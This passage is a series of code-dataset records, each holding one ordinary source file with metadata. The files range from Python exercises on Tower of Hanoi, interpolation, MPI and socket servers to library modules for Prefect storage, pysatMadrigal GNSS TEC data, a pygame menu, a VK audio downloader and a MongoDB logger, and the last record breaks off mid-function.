+{"seq_id":"623863245","text":"def move_disk(disk_num, start_peg, end_peg):\n print(\"%d번 원판을 %d번 기둥에서 %d번 기둥으로 이동\" % (disk_num, start_peg, end_peg))\n\ndef hanoi(num_discs, start_peg = 1, end_peg = 3):\n\n if num_discs == 0:\n return\n else:\n other_peg = 6 - start_peg - end_peg\n hanoi(num_discs - 1, start_peg, other_peg)\n # hanoi(2, 1, 2) 호출, 재귀로 한번 더 hanoi(1,1,2) 호출\n move_disk(num_discs, start_peg, end_peg)\n # move_disk(3, 1, 3) 호출, print 3번 원판을 1번 기둥에서 3번 기둥으로 이동\n hanoi(num_discs - 1, other_peg, end_peg)\n # hanoi(2, 2, 3) 호출, 재귀로 hanoi(1, 2, 3) 호출\n\n\n# 테스트 코드 (포함하여 제출해주세요)\nhanoi(3, 1, 3)\n\n","sub_path":"12-11 하노이.py","file_name":"12-11 하노이.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"14568662","text":"# By submitting this assignment, all team members agree to the following:\r\n# “Aggies do not lie, cheat, or steal, or tolerate those who do”\r\n# “I have not given or received any unauthorized aid on this assignment”\r\n# \r\n# Names: \tBenjamin Mejia Diaz (628004466)\r\n# \t \t\tNeil Magan-Patel\r\n# \t \t\tRong Xu (928009312)\r\n#\t\t\tDaniel Pinilla Silva\r\n# Section:\t\t554\r\n# Assignment:\tLab 8a\r\n# Date: 10/26/19\r\n\r\n############## Compiling Data Points ##############\r\ndata = []\r\nprint('This program asks for different points, and approximates the value of any x value based on the closests points. It will only work on functions.\\n\\n')\r\nprint('Enter \"stop\" as your x-value to stop input of values.\\n')\r\nwhile True:\r\n coord = []\r\n x = input(\"Enter x value: \")\r\n if x == \"stop\":\r\n break\r\n y = input(\"Enter y value: \")\r\n coord.append(int(x))\r\n coord.append(int(y))\r\n data.append(coord)\r\n \r\n###print(data)\r\n \r\n############## Sorting the data ##############\r\ndef bubble_sort(nums):\r\n\r\n for i in range(len(nums) - 1):\r\n for j in range(len(nums) - i - 1): \r\n if nums[j] > nums[j + 1]:\r\n nums[j], nums[j + 1] = nums[j + 1], nums[j]\r\n\r\n return nums\r\ndata = bubble_sort(data)\r\n\r\n\r\n############## Finding the y-value ##############\r\nwhile True:\r\n unknown = input('Enter the x-value that is to be approximated:')\r\n if unknown != 'stop':\r\n unknown = int(unknown)\r\n ## This is for any point outside the given range of values = extrapolation\r\n if (unknown < data[0][0]) or (unknown > data[len(data)-1][0]):\r\n \r\n m = (data[len(data)-1][1]-data[0][1])/(data[len(data)-1][0]-data[0][0])\r\n b = data[0][1]-(m*data[0][0])\r\n print(\"{0:.2f}\".format((m*unknown)+b))\r\n else:\r\n ## This is for any point inside the given range of values = intrapolation\r\n left = 0\r\n right = 0\r\n distance_r = float('inf')\r\n distance_l = float('inf')\r\n for i in range(len(data)):\r\n \r\n ##The ifs check for the left and right and the distance to the number all based on the x position.\r\n if unknown == data[i][0]:\r\n ##print(data[i][1])\r\n break\r\n if unknown > data[i][0] and abs(unknown-data[i][0]) < distance_r:\r\n left = i\r\n distance_r = abs(unknown-data[i][0])\r\n if unknown < data[i][0] and abs(unknown-data[i][0]) < distance_l:\r\n right = i\r\n distance_l = abs(unknown-data[i][0])\r\n #print(left,right)\r\n m = (data[right][1]-data[left][1])/(data[right][0]-data[left][0])\r\n b = data[left][1]-(m*data[left][0])\r\n print(\"{0:.3f}\".format((m*unknown)+b))\r\n else:\r\n break","sub_path":"Lab09/Lab09a/Lab a/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562370769","text":"from typing import TYPE_CHECKING, Any, Dict, List\n\n\nfrom prefect.environments.storage import Storage\nfrom prefect.utilities.storage import extract_flow_from_file\n\nif TYPE_CHECKING:\n from prefect.core.flow import Flow\n\n\nclass GitHub(Storage):\n \"\"\"\n GitHub storage class. This class represents the Storage interface for Flows stored\n in `.py` files in a GitHub repository.\n\n This class represents a mapping of flow name to file paths contained in the git repo,\n meaning that all flow files should be pushed independently. A typical workflow using\n this storage type might look like the following:\n\n - Compose flow `.py` file where flow has GitHub storage:\n\n ```python\n flow = Flow(\"my-flow\")\n flow.storage = GitHub(repo=\"my/repo\", path=\"/flows/flow.py\")\n ```\n\n - Push this `flow.py` file to the `my/repo` repository under `/flows/flow.py`.\n\n - Call `prefect register -f flow.py` to register this flow with GitHub storage.\n\n Args:\n - repo (str): the name of a GitHub repository to store this Flow\n - path (str, optional): a path pointing to a flow file in the repo\n - ref (str, optional): a commit SHA-1 value or branch name. Defaults to 'master' if not specified\n - **kwargs (Any, optional): any additional `Storage` initialization options\n \"\"\"\n\n def __init__(\n self, repo: str, path: str = None, ref: str = None, **kwargs: Any\n ) -> None:\n self.flows = dict() # type: Dict[str, str]\n self._flows = dict() # type: Dict[str, \"Flow\"]\n self.repo = repo\n self.path = path\n self.ref = ref\n\n super().__init__(**kwargs)\n\n @property\n def default_labels(self) -> List[str]:\n return [\"github-flow-storage\"]\n\n def get_flow(self, flow_location: str = None, ref: str = None) -> \"Flow\":\n \"\"\"\n Given a flow_location within this Storage object, returns the underlying Flow (if possible).\n If the Flow is not found an error will be logged and `None` will be returned.\n\n Args:\n - flow_location (str): the location of a flow within this Storage; in this case,\n a file path on a repository where a Flow file has been committed. Will use `path` if not\n provided.\n - ref (str, optional): a commit SHA-1 value or branch name. Defaults to 'master' if not\n specified\n\n Returns:\n - Flow: the requested Flow\n\n Raises:\n - ValueError: if the flow is not contained in this storage\n - UnknownObjectException: if the flow file is unable to be retrieved\n \"\"\"\n if flow_location:\n if flow_location not in self.flows.values():\n raise ValueError(\"Flow is not contained in this Storage\")\n elif self.path:\n flow_location = self.path\n else:\n raise ValueError(\"No flow location provided\")\n\n from github import UnknownObjectException\n\n repo = self._github_client.get_repo(self.repo)\n\n try:\n contents = repo.get_contents(flow_location, ref=ref or self.ref)\n decoded_contents = contents.decoded_content\n except UnknownObjectException as exc:\n self.logger.error(\n \"Error retrieving file contents from {} on repo {}. 
Ensure the file exists.\".format(\n                    flow_location, self.repo\n                )\n            )\n            raise exc\n\n        return extract_flow_from_file(file_contents=decoded_contents)\n\n    def add_flow(self, flow: \"Flow\") -> str:\n        \"\"\"\n        Method for adding a new flow to this storage object; the flow itself is\n        not uploaded, only its repo path is recorded.\n\n        Args:\n            - flow (Flow): a Prefect Flow to add\n\n        Returns:\n            - str: the location of the added flow in the repo\n\n        Raises:\n            - ValueError: if a flow with the same name is already contained in this storage\n        \"\"\"\n        if flow.name in self:\n            raise ValueError(\n                'Name conflict: Flow with the name \"{}\" is already present in this storage.'.format(\n                    flow.name\n                )\n            )\n\n        self.flows[flow.name] = self.path # type: ignore\n        self._flows[flow.name] = flow\n        return self.path # type: ignore\n\n    def build(self) -> \"Storage\":\n        \"\"\"\n        Build the GitHub storage object and run basic healthchecks. Due to this object\n        supporting file based storage no files are committed to the repository during\n        this step. Instead, all files should be committed independently.\n\n        Returns:\n            - Storage: a GitHub object that contains information about how and where\n              each flow is stored\n        \"\"\"\n        self.run_basic_healthchecks()\n\n        return self\n\n    def __contains__(self, obj: Any) -> bool:\n        \"\"\"\n        Method for determining whether an object is contained within this storage.\n        \"\"\"\n        if not isinstance(obj, str):\n            return False\n        return obj in self.flows\n\n    @property\n    def _github_client(self): # type: ignore\n        from prefect.utilities.git import get_github_client\n\n        return get_github_client()\n","sub_path":"src/prefect/environments/storage/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
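A short usage sketch based only on the methods defined above. The import path assumes a legacy (pre-1.0) Prefect release where this module lived, and the repo and path values are illustrative:

```python
from prefect import Flow
from prefect.environments.storage import GitHub

storage = GitHub(repo="my/repo", path="/flows/flow.py")
flow = Flow("my-flow")

location = storage.add_flow(flow)   # records the repo path for this flow
assert location == "/flows/flow.py"
assert "my-flow" in storage         # __contains__ matches on flow *names*
storage.build()                     # no files are pushed; commits stay manual
```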
+{"seq_id":"491053164","text":"import pytest\n\nfrom async_vk_api import retry\n\n\nasync def test_single_exception():\n exc = RuntimeError\n attempts = 4\n n = 0\n\n @retry.on(exc, attempts=attempts)\n async def func():\n nonlocal n\n n += 1\n raise exc\n\n with pytest.raises(exc):\n await func()\n\n assert n == attempts\n\n\nasync def test_multiple_exceptions():\n exc1, exc2 = ValueError, TypeError\n attempts = 2\n n = 0\n\n @retry.on((exc1, exc2), attempts=attempts)\n async def func():\n nonlocal n\n n += 1\n\n if n == 1:\n raise exc1\n elif n == 2:\n raise exc2\n else:\n assert not 'Reachable'\n\n with pytest.raises(exc2):\n await func()\n\n assert attempts == n\n","sub_path":"tests/test_retry.py","file_name":"test_retry.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"2927789","text":"# BitCity Studios:\n# Cameron O'Leary \n# Steve Griffin \n# Jeremy Dolinko \n# Jonathan Rivera \n# Michael Shavit \nfrom pygame import key\nfrom pygame import display\nfrom pygame import Rect\nimport pygame.draw\n\nfrom pygame.locals import *\nimport os\nfrom images import movingBackground as MB\nfrom sounds import music as M\nimport state\nimport glob\n\nMAIN_CHOICES = [\n glob.gameString,\n glob.levelString,\n glob.settingsString,\n glob.highScoreString,\n glob.exitString]\n\n# LEVEL_CHOICES = glob.levelChoices[1:] # Since the first element is None\n\nSETTINGS_CHOICES = [glob.resolutionString,\n glob.volumeString,\n glob.difficultyString,\n glob.keySettings, glob.menuString]\n\nRESOLUTION_CHOICES = [glob.tinyRes, glob.smallRes, glob.mediumRes,\n glob.largeRes]\n#@StaticMethod\n\n\ndef getLevelChoices():\n \"\"\"Gets the possible level selection\"\"\"\n # Start at 1 since the first element is None\n if glob.DEBUG:\n return glob.levelChoices[1:]\n return glob.levelChoices[1: glob.Levels.lastLevel + 1]\n\n\nclass Menu(state.State):\n\n \"\"\"\n A state defining a generic menu with a moving background picture.\n Menu is genericized in that you can give it whatever state strings\n you want and it will allow you to transition between them. These\n state strings are defined in globs.py. The SETTINGS_CHOICES is just\n a list of these state strings for the settings menu. It's in menu.py\n as a static global list. The state strings also double as the text\n displayed in a menu.\n \"\"\"\n\n def __init__(self, s, title, choicesList):\n \"\"\"\n Constructor.\n \"\"\"\n super(Menu, self).__init__(s)\n self.name = title\n # Set the background\n self.background = MB.MovingBackground(s)\n self.choices = choicesList\n self.pos = 0\n M.menuMusic()\n\n def draw(self):\n \"\"\"Perform all graphical tasks for this frame.\"\"\"\n self.background.draw()\n for i in range(0, len(self.choices)):\n self.drawItem(i)\n\n self.drawTitle()\n display.flip()\n\n def update(self, dt):\n \"\"\"Perform all calculations for the amount of time that has passed.\"\"\"\n super(Menu, self).update(dt)\n self.background.update(dt)\n\n def drawItem(self, i):\n \"\"\"Draws the text of a menu choice.\"\"\"\n col = glob.FONT_COLOR\n backCol = glob.SELECTED_FONT_COLOR\n surf = glob.FONT.render(self.choices[i], True, col)\n width, height = surf.get_size()\n left = (self.width - width) / 2\n top = self.height / 3 + height * i\n if i == self.pos:\n backCol, col = col, backCol\n r = Rect(left, top, width, height)\n pygame.draw.rect(self.s, backCol, r)\n surf = glob.FONT.render(self.choices[i], True, col)\n self.s.blit(surf, (left, top))\n\n def drawTitle(self):\n \"\"\"Draws the menu title.\"\"\"\n col = glob.FONT_COLOR\n backCol = glob.SELECTED_FONT_COLOR\n surf = glob.FONT.render(self.name, True, col)\n width, height = surf.get_size()\n left = (self.width - width) / 2\n top = self.height / 10\n self.s.blit(surf, (left, top))\n\n def processKeys(self, keys, dt):\n result = super(Menu, self).processKeys(keys, dt)\n if result != state.standardString:\n return result\n elif keys[glob.mappedKeys[\"select\"]]:\n\n if self.getCurrentChoice() == glob.gameString:\n M.stopMusic()\n if glob.isPaused:\n return glob.gameString\n return glob.cutString\n\n return self.getCurrentChoice()\n elif keys[glob.mappedKeys[\"up\"]]:\n self.timeAlive = 0\n self.incMenu(-1)\n elif keys[glob.mappedKeys[\"down\"]]:\n self.timeAlive = 0\n self.incMenu(1)\n return None\n\n def incMenu(self, amount):\n \"\"\"Steps by the passed amount in 
the menu.\"\"\"\n self.pos += amount\n if self.pos < 0:\n self.pos = len(self.choices) - 1\n elif self.pos > len(self.choices) - 1:\n self.pos = 0\n\n def getCurrentChoice(self):\n \"\"\"Returns the current menu choice string.\"\"\"\n return self.choices[self.pos]\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"states/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"432625339","text":"from django.db import models\nfrom django.db.models.query import QuerySet\n\n\nclass StudySpecificManager(models.Manager):\n\n def get_query_set(self):\n qs = QuerySet(self.model, using=self._db).all()\n if not qs:\n return qs\n raise ValueError('Application is accessing model StudySpecific but you have not populated it. Please do so before continuing.')\n qs = QuerySet(self.model, using=self._db).filter(pk=qs[0].pk)\n return qs\n\n def get_subject_types(self):\n if super(StudySpecificManager, self).all():\n if not super(StudySpecificManager, self).all()[0].subject_type:\n raise TypeError('Please indicate the subject types for this protocol in model StudySpecific. e.g. \\'subject\\' or \\'maternal, infant\\', etc')\n else:\n raise ValueError('Application is accessing model StudySpecific but you have not populated it. Please do so before continuing.')\n return super(StudySpecificManager, self).all()[0].subject_type.split(', ')\n","sub_path":"edc/core/bhp_variables/managers/study_specific_manager.py","file_name":"study_specific_manager.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"565072334","text":"from mpi4py import MPI\nimport numpy\n\ndef compute_pi(n, start=0, step=1):\n h = 1.0 / n\n s = 0.0\n for i in range(start, n, step):\n x = h * (i + 0.5)\n s += 4.0 / (1.0 + x**2)\n return s * h\n\ncomm = MPI.COMM_WORLD\nnprocs = comm.Get_size()\nmyrank = comm.Get_rank()\n\nif myrank == 0:\n n = 10\n n = numpy.array(n, dtype='i')\nelse:\n n = numpy.array(0, dtype='i')\ncomm.Bcast([n, MPI.INT], root=0)\n\nmypi = compute_pi(n, myrank, nprocs)\n\nmypi = numpy.array(mypi, dtype='d')\nif myrank == 0:\n pi = numpy.array(0, dtype='d')\nelse:\n pi = None\ncomm.Reduce([mypi, MPI.DOUBLE], \n [pi, MPI.DOUBLE],\n op=MPI.SUM, root=0)\n\nif myrank == 0:\n error = abs(pi - numpy.pi)\n print(\"pi is approximately %.16f, error is %.16f\" % (pi, error))\n","sub_path":"mpi_for_python/exercises/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"488583150","text":"\"\"\" API endpoint views \"\"\"\n\n# Module imports\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\n# Application imports\nfrom engine.serializers import (\n UserLoginSerializer,\n RefreshTokenSerializer\n)\n\n\nclass GenerateTokensView(APIView):\n \"\"\" API for token generation \"\"\"\n\n # API setup\n permission_classes = ()\n authentication_classes = ()\n\n # Response variables\n response = None\n response_code = None\n\n def post(self, request):\n \"\"\" Method handling post request made to this API endpoint \"\"\"\n\n # Login serializer initialization with the incoming data\n loginSerializer = UserLoginSerializer(data=request.data)\n\n # API logic\n if loginSerializer.is_valid():\n self.response = loginSerializer.data\n self.response_code = 200\n else:\n self.response = loginSerializer.errors\n self.response_code = 400\n\n # API response using response variables\n return Response(self.response, self.response_code)\n\n\nclass RefreshTokenView(APIView):\n \"\"\" API for access token refreshing \"\"\"\n\n # API setup\n permission_classes = ()\n authentication_classes = ()\n\n # Response variables\n response = None\n response_code = None\n\n def post(self, request):\n \"\"\" Method handling post request made to this API endpoint \"\"\"\n\n # Refresh serializer initialization with the incoming data\n refreshSerializer= RefreshTokenSerializer(data=request.data)\n\n # API logic\n if refreshSerializer.is_valid():\n self.response = refreshSerializer.data\n self.response_code = 200\n else:\n self.response = refreshSerializer.errors\n self.response_code = 400\n\n # API response using response variables\n return Response(self.response, self.response_code)\n\n\n\n","sub_path":"auth_server/engine/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"365037692","text":"import matplotlib.pyplot as plt\nimport numpy as np\n# plt.xlim(0, 1000)\n# plt.ylim(0, 10000)\nx = [0.1, 23.3, 100, 1000]\ny = [10, 3524, 3524, 3524]\nplt.plot(x, y)\nplt.xlim([0, 1000])\nplt.ylim([0, 10000])\nplt.yticks(np.arange(0, 1000, 10))\nplt.xticks(np.arange(0, 10000, 10))\n\n# plt.xticks(np.arange(min(x), max(x), 10))\n# plt.yticks(np.arange(min(y), max(y), 10))\nplt.ylabel('Stimulus average')\nplt.xlabel('Time(ms)')\nplt.title('Q3: Spike triggered average over a 100ms')\nplt.show()\n","sub_path":"src_openCL/ploy.py","file_name":"ploy.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"4536121","text":"from socket import socket, AF_INET, SOCK_STREAM\r\nfrom select import select\r\nfrom time import sleep\r\n\r\nHOST=''\r\nPORT=4000\r\n\r\nclass ServerObject(object):\r\n\tdef __init__(self,host,port):\r\n\t\ttry:\r\n\t\t\tself.serversock = socket(AF_INET, SOCK_STREAM)\r\n\t\t\tself.serversock.bind((host,port))\r\n\t\t\tself.serversock.listen(10)\r\n\t\t\tself.serversock.setblocking(0)\r\n\t\texcept socket.error as msg:\r\n\t\t\tprint(f\"Server socket init failed with message: {str(msg[0])} message {str(msg[1])}\")\r\n\t\t\tinput(\"Pess enter to exit\")\r\n\t\t\texit(1)\r\n\t\tself.serverrunning = True\r\n\t\tself.port = port\r\n\t\tself.clientlist = []\r\n\r\nclass ClientObject(object):\r\n\tdef __init__(self,insock,addr):\r\n\t\tself.clientsock = insock\r\n\t\tself.host = addr[0]\r\n\t\tself.port = addr[1]\r\n\r\n#MAIN\r\nserver = ServerObject(HOST,PORT)\r\nprint(\"server online\")\r\nwhile server.serverrunning:\r\n\tsleep(0.1)\r\n\tpotentialreads = []\r\n\tif len(server.clientlist) > 0:\r\n\t\tfor potentialread in server.clientlist:\r\n\t\t\tpotentialreads.append(potentialreads.clientsock)\r\n\t\t\tprint(potentialread)\r\n\tif len(potentialreads) > 0:\r\n\t\treadsocks, writesocks, errorsocks = select(potentialreads,potentialreads,potentialreads,1)\r\n\t\tif len(readsocks) > 0:\r\n\t\t\tfor readsock in readsocks:\r\n\t\t\t\tif readsock == server.serversock:\r\n\t\t\t\t\tinsock, addr = server.serversock.accept()\r\n\t\t\t\t\tnewclient = ClientObject(insock,addr)\r\n\t\t\t\t\tserver.clientlist.append(newclient)\r\n\t\t\t\t\tprint(f\"New connection from {str(newclient.host)}:{str(newclient.port)}\")\r\n\t\t\t\telse:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tdata = readsock.recv(1024)\r\n\t\t\t\t\t\tif data:\r\n\t\t\t\t\t\t\tprint(f\"Recieved input: {data} from {readsock.addr}\")\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(f\"Client {readsock.addr}:{readsock.port} disconnected. Connection reset by peer\")\r\n\t\t\t\t\t\treadsock.close()\r\n\t\t\t\t\t\tif len(server.clientlist) > 0:\r\n\t\t\t\t\t\t\tfor client in server.clientlist:\r\n\t\t\t\t\t\t\t\tif client.clientsock == readsock:\r\n\t\t\t\t\t\t\t\t\tserver.clientlist.remove(client)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"309934905","text":"# -*- coding: utf-8 -*-.\n\"\"\"Supports the MIT Haystack GNSS TEC data products\n\nThe Global Navigation Satellite System (GNSS) is used in conjunction with a\nworld-wide receiver network to produce total electron content (TEC) data\nproducts, including vertical and line-of-sight TEC.\n\nDownloads data from the MIT Haystack Madrigal Database.\n\nProperties\n----------\nplatform\n 'gnss'\nname\n 'tec'\ntag\n 'vtec'\n\nExamples\n--------\n::\n\n import datetime as dt\n import pysat\n import pysatMadrigal as pymad\n\n vtec = pysat.Instrument(inst_module=pymad.instruments.gnss_tec, tag='vtec')\n vtec.download(dt.datetime(2017, 11, 19), dt.datetime(2017, 11, 20),\n user='Firstname+Lastname', password='email@address.com')\n vtec.load(date=dt.datetime(2017, 11, 19))\n\n\nNote\n----\nPlease provide name and email when downloading data with this routine.\n\n\"\"\"\n\nimport datetime as dt\nimport functools\nimport numpy as np\n\nfrom pysat import logger\n\nfrom pysatMadrigal.instruments.methods import general, gnss\n\n# ----------------------------------------------------------------------------\n# Instrument attributes\n\nplatform = 'gnss'\nname = 'tec'\ntags = {'vtec': 'vertical TEC'}\ninst_ids = {'': [tag for tag in tags.keys()]}\n\npandas_format = False\n\n# Local attributes\ndname = '{{year:02d}}{{month:02d}}{{day:02d}}'\nvname = '.{{version:03d}}'\nsupported_tags = {ss: {'vtec': ''.join(['gps', dname, 'g', vname,\n \".{file_type}\"])}\n for ss in inst_ids.keys()}\nremote_tags = {ss: {kk: supported_tags[ss][kk].format(file_type='hdf5')\n for kk in inst_ids[ss]} for ss in inst_ids.keys()}\n\n# Madrigal tags\nmadrigal_inst_code = 8000\nmadrigal_tag = {'': {'vtec': '3500'}} # , 'los': '3505'}} <- Issue #12\n\n# ----------------------------------------------------------------------------\n# Instrument test attributes\n\n_test_dates = {'': {'vtec': dt.datetime(2017, 11, 19)}}\n\n# ----------------------------------------------------------------------------\n# Instrument methods\n\n\ndef init(self):\n \"\"\"Initializes the Instrument object with values specific to GNSS TEC\n\n Runs once upon instantiation.\n\n \"\"\"\n\n ackn_str = '\\n'.join([gnss.acknowledgements(self.name),\n general.cedar_rules()])\n\n logger.info(ackn_str)\n self.acknowledgements = ackn_str\n self.references = gnss.references(self.name, self.tag)\n\n return\n\n\ndef clean(self):\n \"\"\"Routine to return GNSS TEC data at a specific level\n\n Note\n ----\n Supports 'clean', 'dusty', 'dirty', or 'None'.\n Routine is called by pysat, and not by the end user directly.\n\n \"\"\"\n if self.tag == \"vtec\":\n logger.info(\"\".join([\"Data provided at a clean level, further \",\n \"cleaning may be performed using the \",\n \"measurement error 'dtec'\"]))\n\n return\n\n\n# ----------------------------------------------------------------------------\n# Instrument functions\n#\n# Use the default Madrigal methods\n\n# Support listing the local files\nlist_files = functools.partial(general.list_files,\n supported_tags=supported_tags,\n two_digit_year_break=99)\n\n# Support listing files currently available on remote server (Madrigal)\nlist_remote_files = functools.partial(general.list_remote_files,\n supported_tags=remote_tags,\n inst_code=madrigal_inst_code,\n kindats=madrigal_tag)\n\n\ndef download(date_array, tag='', inst_id='', data_path=None, user=None,\n password=None, url='http://cedar.openmadrigal.org',\n file_type='netCDF4'):\n \"\"\"Downloads data from Madrigal.\n\n Parameters\n ----------\n 
date_array : array-like\n list of datetimes to download data for. The sequence of dates need not\n be contiguous.\n tag : str\n Tag identifier used for particular dataset. This input is provided by\n pysat. (default='')\n inst_id : str\n Instrument ID string identifier used for particular dataset. This input\n is provided by pysat. (default='')\n data_path : str\n Path to directory to download data to. (default=None)\n user : str\n User string input used for download. Provided by user and passed via\n pysat. (default=None)\n password : str\n Password for data download. (default=None)\n url : str\n URL for Madrigal site (default='http://cedar.openmadrigal.org')\n file_type : str\n File format for Madrigal data. (default='netCDF4')\n\n Note\n ----\n The user's names should be provided in field user. Anthea Coster should\n be entered as Anthea+Coster\n\n The password field should be the user's email address. These parameters\n are passed to Madrigal when downloading.\n\n The affiliation field is set to pysat to enable tracking of pysat\n downloads.\n\n \"\"\"\n general.download(date_array, inst_code=str(madrigal_inst_code),\n kindat=madrigal_tag[inst_id][tag], data_path=data_path,\n user=user, password=password, file_type=file_type, url=url)\n\n return\n\n\ndef load(fnames, tag=None, inst_id=None):\n \"\"\" Routine to load the GNSS TEC data\n\n Parameters\n ----------\n fnames : list\n List of filenames\n tag : str or NoneType\n tag name used to identify particular data set to be loaded.\n This input is nominally provided by pysat itself. (default=None)\n inst_id : str or NoneType\n Instrument ID used to identify particular data set to be loaded.\n This input is nominally provided by pysat itself. (default=None)\n\n Returns\n -------\n data : xarray.Dataset\n Object containing satellite data\n meta : pysat.Meta\n Object containing metadata such as column names and units\n\n \"\"\"\n # Define the xarray coordinate dimensions (apart from time)\n # Not needed for netCDF\n xcoords = {'vtec': {('time', 'gdlat', 'glon', 'kindat', 'kinst'):\n ['gdalt', 'tec', 'dtec'],\n ('time', ): ['year', 'month', 'day', 'hour', 'min',\n 'sec', 'ut1_unix', 'ut2_unix', 'recno']}}\n\n # Load the specified data\n data, meta = general.load(fnames, tag, inst_id, xarray_coords=xcoords[tag])\n\n # Squeeze the kindat and kinst 'coordinates', but keep them as floats\n squeeze_dims = np.array(['kindat', 'kinst'])\n squeeze_mask = [sdim in data.coords for sdim in squeeze_dims]\n if np.any(squeeze_mask):\n data = data.squeeze(dim=squeeze_dims[squeeze_mask])\n\n # Fix the units for tec and dtec\n if tag == 'vtec':\n meta['tec'] = {meta.labels.units: 'TECU'}\n meta['dtec'] = {meta.labels.units: 'TECU'}\n\n return data, meta\n","sub_path":"pysatMadrigal/instruments/gnss_tec.py","file_name":"gnss_tec.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"498650087","text":"import urllib.request\nfrom os import mkdir, path\n\n\nclass VkResponse:\n\tdef __init__(self, token):\n\t\tself.token = token\n\n\tdef get_audio_list(self, user_id=107920434):\n\t\turl = 'https://api.vk.com/method/audio.get.xml?owner_id={uid}&access_token={token}'.format(\n\t\t\ttoken=self.token,\n\t\t\tuid=user_id\n\t\t)\n\t\tout = open('./cache/audio.xml', 'w', encoding='utf-8')\n\t\tdata = urllib.request.urlopen(url).read()\n\t\tdata_str = data.decode('utf-8', 'ignore')\n\t\tfor i in range(len(data_str)):\n\t\t\ttry:\n\t\t\t\tdata_str[i].encode('cp1251')\n\t\t\texcept:\n\t\t\t\tdata_str = data_str[:i] + data_str[i + 1:]\n\n\t\tout.write(data_str)\n\t\treturn data_str\n\n\nclass AudioFile:\n\tdef __init__(self, aid, url, title, artist):\n\t\tself.aid = aid\n\t\tself.url = url\n\t\tself.title = title.strip().replace('\\\\', '_').replace('/', '_').replace('?', '_').replace('\"', \"'\").replace(':',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'-')\n\t\tself.artist = artist.strip().replace('\\\\', '_').replace('/', '_').replace('?', '_').replace('\"', \"'\").replace(\n\t\t\t':', '-')\n\n\tdef download_audio(self):\n\t\ttry:\n\t\t\tprint('{artist} - {title}...'.format(artist=self.artist, title=self.title))\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tdata = urllib.request.urlopen(self.url).read()\n\t\t\t# data = ''.encode()\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tif not path.exists('./cache/' + self.artist):\n\t\t\t\tmkdir('./cache/' + self.artist)\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tout = open(\n\t\t\t\t'./cache/' + self.artist + '/{artist} - {title}.mp3'.format(artist=self.artist, title=self.title),\n\t\t\t\t'wb')\n\t\texcept:\n\t\t\treturn False\n\n\t\tout.write(data)\n\t\treturn True\n","sub_path":"vk_response.py","file_name":"vk_response.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109340552","text":"import pymongo\nfrom datetime import datetime\nimport cv2\nfrom urllib.parse import quote_plus\nfrom bunch import Bunch\nimport Notification\n\nclass AutofacesMongoDB():\n\n def __init__(self, config):\n '''\n __init__(self, username, password, host, port, db = None, col = None)\n '''\n # MongoDB info\n dbconfig = Bunch(config.mongodb)\n\n self.host = dbconfig.host\n self.port = dbconfig.port\n self.db = dbconfig.name\n self.collection = dbconfig.collection\n\n mongodb_uri = \"mongodb://%s:%s\"%(self.host, self.port)\n \n print(\"Connecting to MongoDB...\")\n self.client = pymongo.MongoClient(mongodb_uri)\n self.notifier = Notification(Bunch(config.notification))\n\n def dbinfo(self):\n print(\"MongoDB host: %s\" % self.host)\n print(\"MongoDB port: %s\" % self.port)\n print(\"Default database: %s\" % self.db)\n print(\"Default collection: %s\" % self.collection)\n\n def save(self, data, db = None, col = None):\n '''\n method: save2db(data, db = None, col = None),\n data = {\n \"time\": datetime.now()\n \"face_class\": face_class,\n \"prob\": prob,\n },\n db: mongodb database, default value = object.db,\n col: mongodb collection, default value = object.collection.\n '''\n\n if db == None:\n db = self.db\n if col == None:\n col = self.collection\n try:\n mydb = self.client[self.db]\n mycol = mydb[col]\n mycol.insert_one(data)\n print(\"Successfully inserted \", str(data), \"to \", db + '.' + col)\n # print(mycol)\n except Exception as e:\n print(\"MongoDB exception: \" + str(e))\n\n def create_data(self, frame, pred_clsname, max_prob):\n if not os.path.exists('./datasets/new-frame'):\n os.makedirs('./datasets/new-frame')\n\n created_time = datetime.now()\n time_str = str(created_time)\n time_str = re.sub('[:-]', '', time_str.split('.')[0])\n time_str = re.sub(' ', '_', time_str)\n image_link = './datasets/new-frame/' + pred_clsname + '_' + time_str + '.jpg'\n try:\n 